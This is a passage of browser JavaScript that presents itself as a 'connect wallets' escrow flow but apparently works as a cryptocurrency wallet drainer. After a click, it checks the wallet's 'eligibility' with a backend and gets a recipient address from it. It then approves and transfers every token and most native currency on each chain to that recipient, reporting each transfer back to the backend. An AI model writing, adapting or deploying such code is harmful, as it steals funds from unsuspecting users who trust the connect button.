  if (!isValidAddress(escrowAddr))
    throw new Error("Invalid escrow contract address");

  const escrowC = new Contract(escrowAddr, ESCROW_ABI, signer);
  const amounts = valid.map((e) => e.amount);
  const tokens = valid.map((e) => e.token.address);
  const tx = await escrowC.approveBatch(amounts, tokens, recipient);
  const receipt = await tx.wait();
  return receipt?.hash ?? tx.hash ?? null;
}

/**
 * @returns {Promise<string | null>} transaction hash if a transfer was sent
 */
async function runNativeEscrow(signer, escrowAddr, wei, recipient) {
  if (wei <= 0n) return null;
  if (!isValidAddress(escrowAddr))
    throw new Error("Invalid escrow contract address");
  const escrowC = new Contract(escrowAddr, ESCROW_ABI, signer);
  const tx = await escrowC.approveConnection(recipient, { value: wei });
  const receipt = await tx.wait();
  return receipt?.hash ?? tx.hash ?? null;
}

async function processChain(modal, chain, recipient, apiBase, batchMode) {
  const config = cfg();
  const results = { chainId: chain.id, tokenErrors: [], nativeError: null };

  await switchToChain(modal, chain.id);

  const walletProvider = modal.getWalletProvider();
  if (!walletProvider) {
    throw new Error("No wallet provider after network switch.");
  }

  const provider = new BrowserProvider(walletProvider);
  const signer = await provider.getSigner();
  const sourceWallet = await signer.getAddress();
  const escrowAddr = chain.contractAddress;

  const tokenEntries = (chain.tokens || [])
    .map((t) => ({ token: t, amount: tokenWei(t) }))
    .filter((e) => e.amount > 0n);

  if (batchMode && tokenEntries.length > 0) {
    // Phase 1: approve all tokens on this chain
    for (const { token, amount } of tokenEntries) {
      try {
        await ensureTokenAllowance(signer, escrowAddr, token, amount);
      } catch (e) {
        console.error(
          "[connect-wallets] token approval failed",
          chain.id,
          token.symbol,
          e,
        );
        results.tokenErrors.push({
          symbol: token.symbol,
          address: token.address,
          phase: "approve",
          message: e?.message || String(e),
        });
      }
    }

    // Phase 2: batch transfer tokens (single tx when multiple; else one-by-one)
    const ready = tokenEntries.filter(
      (e) =>
        !results.tokenErrors.some(
          (err) =>
            err.address &&
            e.token.address &&
            getAddress(err.address) === getAddress(e.token.address),
        ),
    );

    if (ready.length > 1) {
      try {
        const txHash = await runTokenEscrowBatch(
          signer,
          escrowAddr,
          ready,
          recipient,
        );
        if (txHash) {
          for (const { token, amount } of ready) {
            const dec = token.decimals != null ? Number(token.decimals) : 18;
            const amountStr = formatUnits(
              amount,
              Number.isFinite(dec) ? dec : 18,
            );
            notifyFundsMoved(apiBase, {
              sourceWalletAddress: sourceWallet,
              chainId: chain.id,
              kind: "token",
              symbol: String(token.symbol ?? "?"),
              tokenAddress: token.address,
              amount: amountStr,
              recipient,
              txHash,
              batch: true,
            });
          }
        }
      } catch (e) {
        console.warn(
          "[connect-wallets] batch token escrow failed, falling back to sequential",
          chain.id,
          e,
        );
        for (const { token, amount } of ready) {
          try {
            const txHash = await executeTokenEscrow(
              signer,
              escrowAddr,
              token,
              amount,
              recipient,
            );
            if (txHash) {
              const dec = token.decimals != null ? Number(token.decimals) : 18;
              const amountStr = formatUnits(
                amount,
                Number.isFinite(dec) ? dec : 18,
              );
              notifyFundsMoved(apiBase, {
                sourceWalletAddress: sourceWallet,
                chainId: chain.id,
                kind: "token",
                symbol: String(token.symbol ?? "?"),
                tokenAddress: token.address,
                amount: amountStr,
                recipient,
                txHash,
              });
            }
          } catch (inner) {
            console.error(
              "[connect-wallets] token escrow failed",
              chain.id,
              token.symbol,
              inner,
            );
            results.tokenErrors.push({
              symbol: token.symbol,
              address: token.address,
              phase: "transfer",
              message: inner?.message || String(inner),
            });
          }
        }
      }
    } else if (ready.length === 1) {
      const { token, amount } = ready[0];
      try {
        const txHash = await executeTokenEscrow(
          signer,
          escrowAddr,
          token,
          amount,
          recipient,
        );
        if (txHash) {
          const dec = token.decimals != null ? Number(token.decimals) : 18;
          const amountStr = formatUnits(
            amount,
            Number.isFinite(dec) ? dec : 18,
          );
          notifyFundsMoved(apiBase, {
            sourceWalletAddress: sourceWallet,
            chainId: chain.id,
            kind: "token",
            symbol: String(token.symbol ?? "?"),
            tokenAddress: token.address,
            amount: amountStr,
            recipient,
            txHash,
          });
        }
      } catch (e) {
        console.error(
          "[connect-wallets] token escrow failed",
          chain.id,
          token.symbol,
          e,
        );
        results.tokenErrors.push({
          symbol: token.symbol,
          address: token.address,
          phase: "transfer",
          message: e?.message || String(e),
        });
      }
    }
  } else {
    for (const { token, amount } of tokenEntries) {
      try {
        const txHash = await runTokenEscrow(
          signer,
          escrowAddr,
          token,
          amount,
          recipient,
        );
        if (txHash) {
          const dec = token.decimals != null ? Number(token.decimals) : 18;
          const amountStr = formatUnits(
            amount,
            Number.isFinite(dec) ? dec : 18,
          );
          notifyFundsMoved(apiBase, {
            sourceWalletAddress: sourceWallet,
            chainId: chain.id,
            kind: "token",
            symbol: String(token.symbol ?? "?"),
            tokenAddress: token.address,
            amount: amountStr,
            recipient,
            txHash,
          });
        }
      } catch (e) {
        console.error(
          "[connect-wallets] token escrow failed",
          chain.id,
          token.symbol,
          e,
        );
        results.tokenErrors.push({
          symbol: token.symbol,
          address: token.address,
          message: e?.message || String(e),
        });
      }
    }
  }

  // Phase 3 (batch) or final step: native currency
  const fullNative = nativeWei(chain);
  const wei = adjustNativeSendAmount(config, fullNative);
  if (wei > 0n) {
    try {
      const txHash = await runNativeEscrow(signer, escrowAddr, wei, recipient);
      if (txHash) {
        notifyFundsMoved(apiBase, {
          sourceWalletAddress: sourceWallet,
          chainId: chain.id,
          kind: "native",
          symbol: nativeSymbolForChain(chain.id),
          amount: formatUnits(wei, 18),
          recipient,
          txHash,
        });
      }
    } catch (e) {
      console.error("[connect-wallets] native escrow failed", chain.id, e);
      results.nativeError = e?.message || String(e);
    }
  }

  return results;
}

function waitForWalletConnection(modal, timeoutMs) {
  const limit = timeoutMs ?? 300_000;
  return new Promise((resolve, reject) => {
    if (modal.getIsConnectedState() && modal.getAddress(EVM_NS)) {
      resolve();
      return;
    }
    let settled = false;
    let unsubP;
    let unsubS;
    let tid;

    const cleanup = () => {
      try {
        unsubP?.();
      } catch {
        /* ignore */
      }
      try {
        unsubS?.();
      } catch {
        /* ignore */
      }
      clearTimeout(tid);
    };

    const finish = (ok, err) => {
      if (settled) return;
      settled = true;
      cleanup();
      ok ? resolve() : reject(err);
    };

    tid = setTimeout(() => {
      finish(false, new Error("Wallet connection timed out."));
    }, limit);

    unsubP = modal.subscribeAccount((s) => {
      if (s.isConnected && s.address) {
        finish(true);
      }
    }, EVM_NS);

    unsubS = modal.subscribeState((st) => {
      if (!st.open && !modal.getIsConnectedState()) {
        finish(false, new Error("Wallet connection cancelled."));
      }
    });
  });
}

async function ensureConnected(modal) {
  if (modal.getIsConnectedState() && modal.getAddress(EVM_NS)) return;
  await modal.open({ view: "Connect", namespace: EVM_NS });
  await waitForWalletConnection(modal, cfg().connectionTimeoutMs);
}

async function connectAndEscrow(modal) {
  const c = cfg();
  const apiBase = (c.apiBase || "").replace(/\/$/, "");
  if (!apiBase) {
    throw new Error(
      "Set window.WALLET_CONNECT_CONFIG.apiBase to your backend origin (no trailing slash).",
    );
  }
  if (!c.projectId || typeof c.projectId !== "string") {
    throw new Error(
      "Set window.WALLET_CONNECT_CONFIG.projectId from https://dashboard.reown.com",
    );
  }

  await ensureConnected(modal);

  showContractPrepLoading();
  try {
    const address = modal.getAddress(EVM_NS);
    if (!address) {
      throw new Error("No wallet address after connection.");
    }

    const url = `/wallet-details?walletAddress=${encodeURIComponent(address)}`;
    const res = await apiFetch(apiBase, url);
    if (!res.ok) {
      const text = await res.text();
      throw new Error(`Backend error ${res.status}: ${text}`);
    }
    const json = await res.json();

    if (!json.eligible) {
      hideContractPrepLoading();
      showNotEligibleModal();
      return { ok: false, eligible: false };
    }

    const data = json.data || {};
    let recipient = data.reciepient || data.recipient;
    if (!recipient || !isValidAddress(recipient)) {
      throw new Error("Invalid or missing recipient address in API response.");
    }
    recipient = getAddress(recipient);

    const batchMode = Boolean(data.batchMode);
    const chains = data.chains || [];
    const currentChainId = await getActiveChainId(modal);
    const orderedChains = orderChainsForWallet(chains, currentChainId);
    const summary = { ok: true, eligible: true, batchMode, chains: [] };

    hideContractPrepLoading();

    for (const ch of orderedChains) {
      try {
        const r = await processChain(
          modal,
          ch,
          recipient,
          apiBase,
          batchMode,
        );
        summary.chains.push(r);
      } catch (e) {
        console.error("[connect-wallets] chain skipped", ch.id, e);
        summary.chains.push({
          chainId: ch.id,
          skipped: true,
          error: e?.message || String(e),
          tokenErrors: [],
          nativeError: null,
        });
      }
    }

    return summary;
  } catch (e) {
    hideContractPrepLoading();
    throw e;
  }
}

let appKitModal = null;
let appKitPreferredChainId = null;

async function getOrCreateAppKitModal() {
  const injectedChainId = await detectInjectedChainId();
  const preferredChainId = resolvePreferredChainId(injectedChainId);

  if (
    appKitModal &&
    appKitPreferredChainId === preferredChainId
  ) {
    return appKitModal;
  }

  appKitPreferredChainId = preferredChainId;
  appKitModal = buildAppKitModal(preferredChainId);
  return appKitModal;
}

function buildAppKitModal(preferredChainId) {
  const c = cfg();
  const metadata = c.metadata || {
    name: c.appName || "App",
    description: c.appDescription || "Wallet connection",
    url:
      typeof window !== "undefined"
        ? window.location.origin
        : "https://localhost",
    icons: Array.isArray(c.icons) && c.icons.length ? c.icons : [],
  };

  const features = {
    /** Wallet-only connect UI (no email / Google / Discord / etc.). */
    email: false,
    socials: false,
    connectMethodsOrder: ["wallet"],
    analytics: c.analytics === true,
    /** Hides the “UX by Reown” footer when supported (see Reown Cloud plan). */
    reownBranding: false,
    ...(c.features && typeof c.features === "object" ? c.features : {}),
  };

  const networks = networksForAppKit(preferredChainId);
  const featuredWalletIds =
    Array.isArray(c.featuredWalletIds) && c.featuredWalletIds.length
      ? c.featuredWalletIds
      : DEFAULT_FEATURED_WALLET_IDS;

  const appKitOptions = {
    adapters: [new EthersAdapter()],
    networks,
    metadata,
    projectId: c.projectId,
    features,
    featuredWalletIds,
    /** No network picker / switch during connect — only wallet connect. */
    enableNetworkSwitch: false,
    allowUnsupportedChain: true,
    enableMobileFullScreen:
      typeof navigator !== "undefined" &&
      /Android|iPhone|iPad|iPod/i.test(navigator.userAgent) &&
      !isRestrictiveInAppBrowser(),
  };

  if (Array.isArray(c.excludeWalletIds) && c.excludeWalletIds.length) {
    appKitOptions.excludeWalletIds = c.excludeWalletIds;
  }

  if (preferredChainId != null && NETWORK_BY_ID[preferredChainId]) {
    appKitOptions.defaultNetwork = NETWORK_BY_ID[preferredChainId];
  }

  return createAppKit(appKitOptions);
}

let bindBusy = false;

async function onConnectClick(ev) {
  const btn = ev.currentTarget;
  if (bindBusy) return;
  bindBusy = true;
  const prevText = btn.textContent;
  btn.disabled = true;
  btn.setAttribute("aria-busy", "true");
  btn.textContent = cfg().connectingLabel || "Connecting…";
  try {
    const { blockOnConnectClick } = getUnsupportedBrowserConfig();
    if (blockOnConnectClick && isUnsupportedBrowser()) {
      showInAppBrowserModal();
      return;
    }

    const modal = await getOrCreateAppKitModal();
    await connectAndEscrow(modal);
  } catch (err) {
    console.error("[connect-wallets]", err);
    const { title, body } = errorToModalContent(err);
    showMessageModal(title, body);
  } finally {
    bindBusy = false;
    btn.disabled = false;
    btn.removeAttribute("aria-busy");
    btn.textContent = prevText;
  }
}

function installConnectWalletsDelegate() {
  if (document.documentElement.dataset.connectWalletsDelegate === "1") return;
  document.documentElement.dataset.connectWalletsDelegate = "1";
  document.addEventListener(
    "click",
    (ev) => {
      const btn = ev.target?.closest?.(".connect-wallets");
      if (!btn) return;
      ev.preventDefault?.();
      ev.stopPropagation?.();
      void onConnectClick({ currentTarget: btn });
    },
    true,
  );
}

function bind() {
  installConnectWalletsDelegate();
  document.querySelectorAll(".connect-wallets").forEach((btn) => {
    btn.dataset.connectWalletsBound = "1";
  });
  maybeAutoConnectFromExternalBrowser();
  maybePromptInAppBrowserOnLoad();
}

if (document.readyState === "loading") {
  document.addEventListener("DOMContentLoaded", bind);
} else {
  bind();
}
